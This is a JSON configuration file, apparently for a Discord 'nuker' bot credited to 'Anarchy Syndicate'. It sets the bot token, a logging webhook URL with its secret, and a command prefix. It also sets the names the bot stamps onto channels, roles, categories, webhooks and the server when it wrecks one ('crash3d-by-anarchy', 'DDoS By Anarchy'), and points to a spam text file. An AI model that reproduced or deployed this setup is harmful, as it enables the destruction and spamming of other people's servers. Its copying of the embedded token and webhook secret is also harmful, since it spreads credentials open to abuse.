{
	"token": "MTMzMDk5MTk4MDQxNDYzNjAzMg.GjW3H4.DNflNQFutfh-KywIonOSQTuNPDVwa-sfGRx8vQ", 
	"prefix": "!", "command_cooldown_time": 30, 

	"loghook": "https://ptb.discord.com/api/webhooks/1330997659355316234/gFKKyGOU9Jt-iJ5ZJQZhug0pD21Qrl95zWV49e_Goh9-GTaMxiH6vO55sUrJhfU9rs_M", 
	"logs_output_type": "console/webhook", 

	"nuke_channels_name": "crash3d-by-anarchy", 
	"nuke_voice_name": "DDoS By Anarchy", 
	"nuke_categories_name": "DDoS By Anarchy", 
	"nuke_server_name": "...<<<CrAsH3D>>>...", 
	"nuke_roles_name": "crash3d", 
	"nuke_webhook_name": "CrAsH3D by Anarchy Syndicate", 

	"nuke_avatar_file": "avatar.jpg", 
	"spam_text_file": "spam_text.txt"
}
